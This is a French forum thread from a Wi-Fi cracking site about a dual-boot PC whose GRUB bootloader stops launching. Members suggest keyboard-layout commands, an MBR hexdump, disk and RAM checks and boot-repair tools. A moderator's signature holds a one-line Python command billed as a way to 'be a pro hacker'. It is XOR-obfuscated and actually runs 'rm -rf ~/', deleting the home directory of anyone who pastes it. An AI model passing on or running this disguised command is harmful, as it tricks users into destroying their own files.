Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 14-12-2012 18:54:25

arcare
Membre Actif

grub grub gr'oups, probleme URGENT svp

Bonjour tout le monde.

A l'heure ou je vous parle, je suis depuis un live de BT5.

Tout a l'heure je taffais tranquilou sur windaube (je sais cest mal). je navais pas touche (touchER) a BT (jai un dual boot win/BT5) depuis quelaues jours et jai voulu redemarer mon pc.

Et la BAM, lordi se lance, grub ne se lance pas, lordi seteind. il se ralume (seul) grub ne se lance pas, il se reeteind ainsi de suite.

je viens vous demander de laide de toute urgence. jai un gros dossier a rendre pour lundi (je suis en etude sup) donc il me faut mon pc.

PS= jai tester de booter en live un ubuntu et quand jarrive sur essayer ubuntu il ne se lance pas il reste sur cette page.
PS2= desole pour lecriture, mais le qwerty je connais pas smile

Voila je compte sur vous c'est vraiment urgent.

merci davance pour votre aide

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 14-12-2012 19:24:58

spawn
Modérateur

Re : grub grub gr'oups, probleme URGENT svp

Bon, premièrement tu peux faire

setxkbmap fr 

pour passer en français sous backtrack.
Fais nous un

hexdump /dev/sda -n 512 -C 

, on va vérifier que grub est toujours là.

Ton BIOS fonctionne ?

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#3 14-12-2012 19:52:04

coyotus
Membre Irremplaçable
Lieu : fort fort lointain

Vérifie ta ram et ton disque dur.

1310812721.gif

#4 14-12-2012 21:58:03

arcare
Membre Actif

Bon problème réglé après pas mal de stress. Au final j'ai telechargé sur autre pc "super grub disk" qui m'a réparé grub. originie du problème: aucune idée.

Voici le lien si un jour vous avez le même probleme: http://www.commentcamarche.net/faq/1596 … sk-live-cd

Merci coyotus pour ta réponse rapide.

Encore une foi je n'avais pas assez cherché, a cause du stress hmm

#5 14-12-2012 23:33:43

antares145
Membre d'honneur
Site Web

Ça me fait toujours sourire (ou pas) les gens qui débarquent sur un forum avec un problème "urgent" :rolleyes;

Bon, au moins ton problème il est réglé, on serait sans doute arrivé à la même conclusion ("réinstalle Grub"). En cas d'urgence ET si tu peux bosser sous Windows, tu peux aussi restaurer le chargeur de démarrage de Win (via une console de récupération et les commandes fixboot/fixmbr ou bien bootrec). Tu ne pourras plus booter sur Linux, mais Windows fonctionnera.

La question est donc de savoir d'où vient le problème. Quand tu auras du temps après ton dossier, je te suggère de faire un checkdisk (ou fsck) de tous tes OS, pour vérifier qu'il n'y a pas d'autres fichiers corrompus. Et comme l'indique Coyotus, tu devrais vraiment vérifier l'état de santé de ton disque dur, via les selftest S.M.A.R.T, si les données ont été corrompues sans raison, c'est peut-être le signe d'une défailalnce disque imminente.

Un dernier conseil : fais une sauvegarde de tes fichiers pour lundi sur un autre disque, des fois que t'auras vraiment pas de chance big_smile

#6 16-12-2012 23:11:35

arcare
Membre Actif

Salut antares

d'habitude quand je vois des "urgent"  je souri aussi, mais quand j'ai vu ca je me suis dit: mince, grub je connais pas du tout, comment je vais faire.
Et comme tu l'as remarqué j'ai un dossier très important à rendre pour lundi (demain) et sur lequel je n'avais pas une seconde a perdre pendant le week.

Je vais m'y pencher des les vacances je pense, selon vous ca pourrait venir du DD?

Merci pour vos indications ! merci aussi a spawn et coyotus, je vous tiendrais au courant de tout cela très bientot, dès que j'aurai un peu de temps pour moi.

sur ce, à bientot et encore merci.

#7 17-12-2012 13:04:07

arcare
Membre Actif

Bonjour tout le monde, suite des évenements:

Aujourd'hui je relance mon ordi pour pofiner mon dossier sur la pause du midi, et la devinez quoi? Ca recommence.

Heureusement que j'avais un vieu CD de ubuntu 11.10 dans ma malette que je garde par flemme de le ranger parce que ca peut toujours être utile.

J'ai lancer boot-repaire car je n'avais pas super-grub sous la main. ca à fonctionné.

Je vais envoyer un rapport à l'adresse qu'ils (ubuntu) indiques après la réstau qui est prévu à cet effet apparemment.

Je soupsonne la mise en veille quand je rabaisse l'écran. A vérifier. Je vais m'y plonger des que j'aurai 2 minutes, je vous tien au courant.

Bonne journée a tous et à bientot

Annonce